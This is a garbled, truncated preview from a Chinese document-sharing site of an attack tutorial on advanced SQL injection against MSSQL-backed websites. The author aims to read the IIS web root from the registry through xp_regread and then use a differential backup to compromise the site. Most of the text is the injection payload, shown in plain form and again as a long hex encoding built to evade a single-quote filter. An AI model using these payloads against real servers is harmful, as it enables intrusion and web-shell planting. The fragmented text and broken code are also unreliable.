欢迎来到天天文库
浏览记录
ID:22372354
大小:59.00 KB
页数:7页
时间:2018-10-28
《sql注入高级技巧nowthk篇》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、SQL注入高级技巧nowthk篇~教育资源库 我的目的主要是取得网站的目录,当然了,网站和mssql数据库在一台服务器上,权限DB_oember(sysadmin))这是简单检测系统权限。还好只是对单引号有限制,其它符号没有限制。不过这一点确实已经够麻烦的了。 我们的目的是检测网站目录在什么地方,如果找到的话,直接差异备份数据库,取得aster.dbo.xp_regreadHKEY_LOCAL_MACHINE,SYSTEMControlSet001ServicesACHINE和SYSTEMControlSet001ServicesACHINE,SYSTE
2、MControlSet001ServicesetersVirtualRoots,/,resultoutputinsertintoxy(xy1)values(result) 全转换为16进制为:0x4400450043004C004100520045002000400072006500730075006C00740020007600610072006300680061007200280032003500350029002000450058004500430020006D00610073007400650072002E00640062006F002E0078007
3、0005F0072006500670072006500610064002000270048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C0043006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C00570033005300560043005C0050006100720061006
4、D00650074006500720073005C005600690072007400750061006C00200052006F006F007400730027002C0027002F0027002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F002000780079002000280078007900310029002000760061006C0075006500730028004000720065007
5、30075006C0074002900这时用DECLARESNVARCHAR(4000);SETS=CAST(1234下一页友情提醒:,特别!0x4400450043004C004100520045002000400072006500730075006C00740020007600610072006300680061007200280032003500350029002000450058004500430020006D00610073007400650072002E00640062006F002E00780070005F0072006500670072006500610
6、064002000270048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C0043006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C00570033005300560043005C0050006100720061006D00650074006500720073005C00560
7、0690072007400750061006C00200052006F006F007400730027002C0027002F0027002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F002000780079002000280078007900310029002000760061006C007500650073002800400072006500730075006C00740
此文档下载收益归作者所有